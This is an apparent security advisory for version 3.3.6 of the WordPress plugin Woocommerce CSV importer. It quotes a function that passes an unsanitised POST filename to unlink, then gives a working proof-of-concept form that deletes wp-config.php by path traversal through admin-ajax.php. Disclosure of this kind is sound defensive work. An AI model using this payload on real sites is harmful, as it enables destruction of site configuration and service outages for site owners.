Plugin Woocommerce CSV importer 3.3.6 – Arbitrary File Deletion – Unlink

Details

  • Name : Woocommerce CSV importer
  • Version : 3.3.6
  • Homepage : https://wordpress.org/plugins/woocommerce-csvimport/

Type

  • Arbitrary File Deletion
  • Remote Code Execution - RCE

Description

  • Type user access: any user registered.
  • $_POST['filename'] is not escaped.

Code

File: wp-content/plugins/woocommerce-csvimport/export/include/classes/woocsvExport.php Line:64
public function delete_export_file() {
   
   if ( isset( $_POST['filename'] ) ) {
      @unlink( $_POST['filename'] );
   }
   wp_die( 0 );
}

Proof Concept

1 – Log in with any user. 2 - Execute form:
<form method="post" action="http://src.wordpress-develop.dev/wp-admin/admin-ajax.php?action=delete_export_file">
   <input type="text" name="filename" value="../wp-config.php">
   <input type="submit">
</form>

Results

wp-config deleted and restart the all system.

Note


Solution


Timeline

  • Date Discovery : 11/23/2017
  • Date Vendor Contact : 12/29/2017
  • Date Publish :
  • Date Resolution :